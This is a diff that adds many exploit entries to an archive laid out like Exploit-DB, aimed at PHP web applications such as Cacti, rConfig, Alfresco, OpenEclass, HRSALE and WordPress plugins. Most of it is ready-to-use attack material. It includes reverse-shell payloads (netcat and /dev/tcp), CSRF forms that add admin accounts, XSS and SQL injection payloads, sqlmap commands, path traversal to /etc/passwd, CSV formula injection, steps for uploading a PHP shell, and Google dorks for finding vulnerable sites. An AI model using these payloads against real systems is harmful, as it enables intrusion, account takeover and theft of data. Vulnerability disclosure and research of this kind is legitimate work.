+# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF 
+# attack to approve an attacker-controlled instructor account can be performed by having the admin 
+# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, 
+# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked 
+# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.
+
+# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor 
+# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval. 
+# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is 
+# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can 
+# be tricked into visiting the link and triggering the request to add an instructor.
+
+<html>
+	<body>
+		<script>history.pushState('', '', '/')</script>
+		<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
+			<input type="hidden" name="action" value="add&#95;new&#95;instructor" />
+			<input type="hidden" name="first&#95;name" value="John" />
+			<input type="hidden" name="last&#95;name" value="Doe" />
+			<input type="hidden" name="user&#95;login" value="jd_instructor" />
+			<input type="hidden" name="email" value="jd@TARGET" />
+			<input type="hidden" name="phone&#95;number" value="1231231231" />
+			<input type="hidden" name="password" value="Pa&#36;&#36;w0rd&#33;" /> 
+			<input type="hidden" name="password&#95;confirmation" value="Pa&#36;&#36;w0rd&#33;" />
+			<input type="hidden" name="tutor&#95;profile&#95;bio" value="Et&#32;tempore&#32;culpa&#32;n" />
+			<input type="hidden" name="action" value="tutor&#95;add&#95;instructor" /> 
+			<input type="submit" value="Submit request" />
+		</form> 
+	</body>
+</html>
+
+3. Timeline
+
+Vulnerability reported to the Tutor LMS team – January 30, 2020.
+Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.
\ No newline at end of file
diff --git a/exploits/php/webapps/48159.rb b/exploits/php/webapps/48159.rb
new file mode 100755
index 000000000..dc70e5b43
--- /dev/null
+++ b/exploits/php/webapps/48159.rb
@@ -0,0 +1,82 @@
+# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
+# Date: 2020-02-29
+# Exploit Author: Lucas Amorim (sh286)s
+# CVE: CVE-2020-8813
+# Vendor Homepage: https://cacti.net/
+# Version: v1.2.8
+# Tested on: Linux
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Cacti v1.2.8 Unauthenticated Remote Code Execution',
+      'Description' => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to 
+        execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has 
+        the graph real-time privilege.},
+      'Author' =>
+        [
+          'Lucas Amorim ' # MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'References' =>
+        [
+          ['CVE', '2020-8813']
+        ],
+      'DisclosureDate' => 'Feb 21 2020',
+      'Privileged' => true,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+        'SSL' => true,
+      },
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget'   => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptString.new('RPATH', [ false, "path to cacti", "" ])
+        ])
+
+        deregister_options('VHOST')
+  end
+
+  def check
+    res = send_request_raw(
+      'method' => 'GET',
+      'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init"
+    )
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def send_payload()
+    exec_payload=(";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % [datastore['LHOST'], datastore['LPORT']])
+    send_request_raw(
+      'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init",
+      'method' => 'GET',
+      'cookie' => "Cacti=#{Rex::Text.uri_encode(exec_payload, mode = 'hex-normal')}"
+    )
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Vulnerable
+      print_good("Target seems to be a vulnerable")
+      send_payload()
+    else
+      print_error("Target does not seem to be vulnerable. Will exit now...")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48162.txt b/exploits/php/webapps/48162.txt
new file mode 100644
index 000000000..f03eaa887
--- /dev/null
+++ b/exploits/php/webapps/48162.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
+# Date: 2020-03-02
+# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://www.alfresco.com/
+# Software Link: https://www.alfresco.com/ecm-software
+# Version: Alfresco before 5.2.4
+# Tested on: 5.2.4
+# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
+# Security advisory: https://gitlab.com/snippets/1937042
+
+
+### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
+
+Each file has a set of properties than can be edited by any authenticated user
+that have write access on the project or the file.
+
+The **URL** property of the file provided by the user is injected in the `href`
+attribute of the HTML link without a proper escaping.
+
+- Where? In URL property
+- Payload: `" onmouseover="alert(document.cookie)"`
+- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
+  ```html
+  <a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
+  ```
+- Privileges: It requires write privileges to store it, any user with read access can see it.
+- Steps to reproduce:
+  1. Go to _Document Library_
+  2. Upload a file or click _Edit properties_ on an existing file
+  3. Enter the payload in the URL property
+  4. Click on the file title to go on the detailed page of the file
+  5. Hover the displayed link to trigger the XSS
+
+### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
+
+There is no file restriction for photo uploading in the user profile page.
+Then the profile picture can be seen in the browser.
+
+- Where? In user profile photo
+- Payload:
+  ```xml
+  <?xml version="1.0" standalone="no"?>
+  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+    <polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
+    <script type="text/javascript">
+        alert('XSS - Orange Cyberdefense');
+    </script>
+  </svg>
+  ```
+- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
+- Privileges: Any authenticated user can store it or trigger it.
+- Steps to reproduce:
+  1. Go to your user profile page (`/share/page/user/<username>/profile`)
+  2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
+  3. Use the document browser or any dashboard to find the uploaded file
+  4. Click on the title to go to the detailed page of the file
+  5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
+
+### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
+
+This is the generic version of the previous XSS. Uploading dangerous file types
+is allowed and then they can be viewed to triggered the XSS. The difference
+between the two is that this one requires right access on a project to upload
+documents so the XSS is not exploitable with a read only account but the
+previous one can be exploited by any user as any user is allowed to have a
+profile photo.
+
+- Where? Uploading a document anywhere
+- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
+- Details: The XSS is triggerred only with the _View in browser_ feature.
+- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
+- Steps to reproduce:
+  1. Go to a project dashboard
+  2. IClick _Upload_ and upload a dangerous file
+  3. Use the document browser or any dashboard to find the uploaded file
+  4. Click on the title to go to the detailed page of the file
+  5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
\ No newline at end of file
diff --git a/exploits/php/webapps/48163.txt b/exploits/php/webapps/48163.txt
new file mode 100644
index 000000000..dc1a98ac8
--- /dev/null
+++ b/exploits/php/webapps/48163.txt
@@ -0,0 +1,116 @@
+# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
+# Google Dork: intext:"© GUnet 2003-2007" 	
+# Date: 2020-03-02
+# Exploit Author: emaragkos
+# Vendor Homepage: https://www.openeclass.org/
+# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+# Version: 1.7.3 (2007)
+# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
+# CVE : -
+
+Older versions are also vulnerable.
+
+Source code:
+http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
+http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+
+Setup instructions:
+http://download.openeclass.org/files/docs/1.7/Install.pdf
+
+Changelog:
+https://download.openeclass.org/files/docs/1.7/CHANGES.txt
+
+Manual:
+https://download.openeclass.org/files/docs/1.7/eClass.pdf
+
+############################################################################
+
+Unauthenticated Information Disclosure
+
+System info
+127.0.0.1/modules/admin/sysinfo 
+(powered by phpSysInfo 2.0 that is also vulnerable)
+
+Web-App version info
+127.0.0.1/README.txt
+127.0.0.1/info/about.php
+127.0.0.1/upgrade/CHANGES.txt
+
+############################################################################
+  
+(Authenticated - Requires student account) - Error-Based SQLi
+
+https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
+
+sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
+
+---
+Parameter: month (GET)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
+---
+ 
+Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
+If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
+If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
+It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
+https://www.exploit-db.com/exploits/48106
+
+############################################################################
+
+(Authenticated - Requires student account) - PHP upload file extension bypass
+If you have a student account you can bypass file extension restrictions and upload a PHP shell.
+Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
+Start looking for a class that you can submit an exercise as a student.
+Register in that class and navigate to submit you exercise.
+If you try to upload a .php file it will be renamed to .phps to prevent execution.
+You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
+Once you have uploaded it, open your course directory and then add "work" directory at the end
+Course link example: https://127.0.0.1/courses/CS101/
+Course link becomes: https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view the directories.
+Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
+Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
+
+The same method works with "groups" if you cant find a class that supports submitting an exercise.
+https://127.0.0.1/modules/group/group.php
+
+############################################################################
+
+(Authenticated - Requires student account) - View assessments of other students
+If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
+Find the course link you are interested in.
+https://127.0.0.1/courses/CS101
+Add "work" directory at the end
+https://127.0.0.1/courses/CS101/work/
+Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
+
+############################################################################
+
+(Authenticated - Requires admin account) - Upload PHP files 
+
+You have to login to the platform as an administrator or user with admin rights.
+You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
+following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
+Once you have logged in as admin:
+1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
+2) Upload your .php shell compressed in a .zip file
+3) Ignore the error message
+4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php 
+
+############################################################################
+
+(Authenticated - Requires admin account) - phpMyAdmin Remote Access 
+
+127.0.0.1/modules/admin/mysql
+phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
+Once you have uploaded your shell can view the config.php file that contains the mysql password
+127.0.0.1/config/config.php 
+
+############################################################################
+
+(Authenticated - Requires admin account) - Plaintext password storage
+
+When logged in as admin you can view all registered users credentials as plaintext.
+127.0.0.1/modules/admin/listusers.php
\ No newline at end of file
diff --git a/exploits/php/webapps/48166.txt b/exploits/php/webapps/48166.txt
new file mode 100644
index 000000000..7baaa901c
--- /dev/null
+++ b/exploits/php/webapps/48166.txt
@@ -0,0 +1,13 @@
+# Exploit Title: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
+# Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+# Date: 2020-02-04
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://github.com/UniSharp/laravel-filemanager
+# Software Link: https://github.com/UniSharp/laravel-filemanager
+# Version: v2.0.0-alpha8 & v2.0.0
+# Tested on: v2.0.0-alpha8 & v2.0.0
+# CVE : N/A
+
+PoC:
+
+http://localhost/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/48177.txt b/exploits/php/webapps/48177.txt
new file mode 100644
index 000000000..6246c0928
--- /dev/null
+++ b/exploits/php/webapps/48177.txt
@@ -0,0 +1,63 @@
+# Exploit Title: 60CycleCMS  - 'news.php' Multiple vulnerability
+# Google Dork: N/A
+# Date: 2020-02-10
+# Exploit Author: Unkn0wn
+# Vendor Homepage: http://davidvg.com/
+# Software Link: https://www.opensourcecms.com/60cyclecms
+# Version: 2.5.2
+# Tested on: Ubuntu
+# CVE : N/A
+---------------------------------------------------------
+
+SQL Injection vulnerability:
+----------------------------
+in file /common/lib.php Line 64 -73
+*
+function getCommentsLine($title)
+{
+$title = addslashes($title);
+$query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'";
+// query MySQL server
+$result=mysql_query($query) or die("MySQL Query fail: $query");
+$numComments = mysql_num_rows($result);
+$encTitle = urlencode($title);
+return '<a href="post.php?post=' . $encTitle . '#comments" >' . $numComments . ' comments</a>';
+}
+lib.php line 44:
+*
+$query = "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `entry_id` ='$title' ORDER BY `timestamp` ASC";
+
+*
+*
+news.php line 3:
+*
+require 'common/lib.php';
+*
+Then in line 15 return query us:
+*
+$query = "SELECT MAX(`timestamp`) FROM `entries
+*
+
+http://127.0.0.1/news.php?title=$postName[SQL Injection]
+----------------------------
+Cross Site-Scripting vulnerability:
+File news.php in line: 136-138 :
+*
+$ltsu = $_GET["ltsu"];
+$etsu = $_GET["etsu"];
+$post = $_GET["post"];
+*
+get payload us and printEnerty.php file in line 26-27:
+*
+<? echo '<a class="navLink" href="index.php?etsu=' . $etsu . '">Older ></a>';
+<? echo '<a class="navLink" href="index.php?ltsu=' . 0 . '">Oldest >>|</a>';
+*
+
+print it for us!
+http://127.0.0.1/index.php?etsu=[XSS Payloads]
+http://127.0.0.1/index.php?ltsu=[XSS Payloads]
+----------------------------------------------------------
+# Contact : 0x9a@tuta.io
+# Visit: https://t.me/l314XK205E
+# @ 2010 - 2020
+# Underground Researcher
\ No newline at end of file
diff --git a/exploits/php/webapps/48179.txt b/exploits/php/webapps/48179.txt
new file mode 100644
index 000000000..39551f06f
--- /dev/null
+++ b/exploits/php/webapps/48179.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Sentrifugo HRMS 3.2 - 'id' SQL Injection
+# Exploit Author: minhnb
+# Website: 
+# Date: 2020-03-06
+# Google Dork: N/A
+# Vendor: http://www.sapplica.com
+# Software Link: http://www.sentrifugo.com/download
+# Affected Version: 3.2 and possibly before
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: PHP
+# Tested on: Win10x64 & Kali Linux
+# CVE: N/A
+ 
+# 1. Technical Description:
+# Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid
+# parameter through POST request in "/sentrifugo/index.php/holidaygroups/add" resource.
+# This allows a user of the application without permissions to read sensitive information from
+# the database used by the application.
+  
+# 2. Proof Of Concept (PoC):
+
+POST /sentrifugo/index.php/holidaygroups/add HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost/sentrifugo/index.php
+Connection: keep-alive
+Cookie: PHPSESSID=j4a2o4mq6frhfltq2a0h2spknh
+Accept: */*
+Accept-Encoding: gzip,deflate
+Content-Length: 98
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
+
+Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate()%2Csleep(9)%2C0))XOR'Z&submit=Save
+
+
+# 3. Payload:
+
+Parameter: id (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0 time-based blind - Parameter replace
+    Payload: Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z&submit=Save
+
+# 4. Reference:
\ No newline at end of file
diff --git a/exploits/php/webapps/48189.txt b/exploits/php/webapps/48189.txt
new file mode 100644
index 000000000..9bbff9866
--- /dev/null
+++ b/exploits/php/webapps/48189.txt
@@ -0,0 +1,34 @@
+# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-03-10
+# Exploit Author: En
+# Vendor Homepage: https://github.com/yzmcms/yzmcms
+# Software Link: https://github.com/yzmcms/yzmcms
+# Version: V5.5
+# Category: Web Application
+# Patched Version: unpatched
+# Tested on: Win10x64
+# Platform: PHP
+# CVE : N/A
+#Exploit Author: En_dust
+
+#Description：
+#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
+
+
+#PoC：
+POST /yzmcms/link/link/add.html HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://127.0.0.1/yzmcms/link/link/add.html
+Content-Length: 130
+Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
+DNT: 1
+Connection: close
+
+name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
\ No newline at end of file
diff --git a/exploits/php/webapps/48190.txt b/exploits/php/webapps/48190.txt
new file mode 100644
index 000000000..7df6fc954
--- /dev/null
+++ b/exploits/php/webapps/48190.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection
+# Data: 2020-03-09
+# Exploit Author: S3FFR
+# Vendor HomagePage: http://download.freescript.ir/scripts/Persian-VIP-Download(FreeScript.ir).zip
+# Version: = 1.0 [Final Version]
+# Tested on: Windows,Linux
+# Google Dork: N/A
+
+
+=======================
+Vulnerable Page:
+
+/cart_edit.php
+
+=======================
+
+Vulnerable Source:
+
+89: mysql_query $user_p = mysql_fetch_array(mysql_query("SELECT * FROM `users` where id='$active'")); 
+71: $active = $_GET['active']; 
+
+======================
+sqlmap:
+
+sqlmap -u "http://target.com/cart_edit.php?active=1" -p active --cookie=[COOKIE] --technique=T --dbs
+=======================
+
+Testing Method :
+	
+	- time-based blind
+
+Parameter: active (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: active=1' AND (SELECT 4169 FROM (SELECT(SLEEP(5)))wAin) AND 'zpth'='zpth
+
+========================
\ No newline at end of file
diff --git a/exploits/php/webapps/48197.txt b/exploits/php/webapps/48197.txt
new file mode 100644
index 000000000..c21b3dddd
--- /dev/null
+++ b/exploits/php/webapps/48197.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection
+# Google Dork: N/A
+# Date: 2020-03-10
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://thunderguy.com/semicolon/
+# Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip
+# Version: 2.13.2
+# Tested on: Windows 7 x86 SP1
+# CVE : N/A
+
+There is a CSV injection vulnerability in the Export function of the Search Meter plugin version 
+
+1) First we introduce the payload in the search bar in Wordpress
+
+=cmd|' /C notepad'!'A1'
+
+
+2) Then we go to http://127.0.0.1/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php and export the CSV file
+
+
+3) After that we open the file in Excel, and import data from an external file, using comma as separator
+
+
+4) Payload gets executed
+
+
+Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
\ No newline at end of file
diff --git a/exploits/php/webapps/48202.txt b/exploits/php/webapps/48202.txt
new file mode 100644
index 000000000..3a7b5b75f
--- /dev/null
+++ b/exploits/php/webapps/48202.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
+# Date: 2020-03-10
+# Author: Milad Karimi
+# Software Link:
+# Version:
+# Category : webapps
+# Tested on: windows 10 , firefox
+# CVE : CWE-89
+# Dork: inurl:index.php?option=com_newsfeeds
+
+
+index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
+
+Example:
+
+http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
\ No newline at end of file
diff --git a/exploits/php/webapps/48204.txt b/exploits/php/webapps/48204.txt
new file mode 100644
index 000000000..d3c7f4d96
--- /dev/null
+++ b/exploits/php/webapps/48204.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
+# Google Dork: N/A
+# Date: 2020-03-05
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.codepeople.net/
+# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
+# Version: 1.3.34
+# Tested on: Windows 7 x86 SP1
+# CVE : CVE-2020-9371, CVE-2020-9372
+
+----Stored Cross-Site-Scripting-------------------
+
+1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
+2) Calendar Name=<script>alert(0)</script> and Update
+3) Click in any of the other tabs
+
+----CSV injection---------------------------------
+
+1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out) 
+2) Then we go to the page and introduce data, and the payload:
+
+New booking:
+
+Name: IMPORTANT DATA
+Description: http://evil.com/evil.php
+
+New booking:
+
+Name: test
+Description: =HYPERLINK(K2;H2) 
+
+This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
+
+3) Then we go to Bookings List and export the CSV file
+4) After that we open the file, and import data from an external file, using comma as separator
+5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
+
+Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
\ No newline at end of file
diff --git a/exploits/php/webapps/48205.txt b/exploits/php/webapps/48205.txt
new file mode 100644
index 000000000..03b2b883e
--- /dev/null
+++ b/exploits/php/webapps/48205.txt
@@ -0,0 +1,51 @@
+# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-03-11
+# Exploit Author: Ismail Akıcı
+# Vendor Homepage: http://hrsale.com/
+# Software Link : http://demo.hrsale.com/
+# Software : HRSALE v1.1.8
+# Product Version: v1.1.8
+# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
+# Vulnerability : Cross-Site Request Forgery
+
+# Description :
+# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
+# With this vulnerability, authorized users can be added to the system.
+
+HTML CSRF PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="&#95;user" value="1" />
+      <input type="hidden" name="csrf&#95;hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
+      <input type="hidden" name="first&#95;name" value="Ismail" />
+      <input type="hidden" name="last&#95;name" value="Akici" />
+      <input type="hidden" name="company&#95;id" value="1" />
+      <input type="hidden" name="location&#95;id" value="1" />
+      <input type="hidden" name="username" value="ismailtakici" />
+      <input type="hidden" name="email" value="ismail&#46;akici&#64;gmail&#46;com" />
+      <input type="hidden" name="date&#95;of&#95;birth" value="2020&#45;03&#45;11" />
+      <input type="hidden" name="contact&#95;no" value="5554443322" />
+      <input type="hidden" name="employee&#95;id" value="1" />
+      <input type="hidden" name="date&#95;of&#95;joining" value="2020&#45;03&#45;11" />
+      <input type="hidden" name="department&#95;id" value="1" />
+      <input type="hidden" name="subdepartment&#95;id" value="YES" />
+      <input type="hidden" name="designation&#95;id" value="9" />
+      <input type="hidden" name="gender" value="Male" />
+      <input type="hidden" name="office&#95;shift&#95;id" value="1" />
+      <input type="hidden" name="password" value="Test1234&#33;" />
+      <input type="hidden" name="confirm&#95;password" value="Test1234&#33;" />
+      <input type="hidden" name="role" value="1" />
+      <input type="hidden" name="leave&#95;categories&#91;&#93;" value="0" />
+      <input type="hidden" name="leave&#95;categories&#91;&#93;" value="1" />
+      <input type="hidden" name="address" value="Test&#32;Address" />
+      <input type="hidden" name="is&#95;ajax" value="1" />
+      <input type="hidden" name="add&#95;type" value="employee" />
+      <input type="hidden" name="form" value="add&#95;employee" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48207.py b/exploits/php/webapps/48207.py
new file mode 100755
index 000000000..284233dc4
--- /dev/null
+++ b/exploits/php/webapps/48207.py
@@ -0,0 +1,50 @@
+# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
+# Date: 2020-03-08
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.rconfig.com/
+# Version: rConfig <= 3.94
+# Tested on: centOS
+# CVE: CVE-2020-10221
+# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
+
+import requests
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+if len(sys.argv) < 6:
+	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+	exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
+
+login = {
+	'user':user,
+	'pass':password,
+	'sublogin':'1'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
+
+payload = {
+	'fileName':payload,
+}
+
+
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'},verify=False)
+
+if exploit.status_code == 200:
+	print "[+] Everything seems ok, check your listener."
+else:
+	print "[-] Exploit failed,  system is patched or credentials are wrong."
\ No newline at end of file
diff --git a/exploits/php/webapps/48208.py b/exploits/php/webapps/48208.py
new file mode 100755
index 000000000..7e7d652c6
--- /dev/null
+++ b/exploits/php/webapps/48208.py
@@ -0,0 +1,107 @@
+# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
+# Exploit Author: vikingfr
+# Date: 2020-03-03
+# CVE-2020-10220
+# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Install scripts  : 
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Version: tested v3.9.4
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# $ python3 rconfig_sqli.py https://1.1.1.1
+# rconfig 3.9 - SQL Injection PoC
+# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
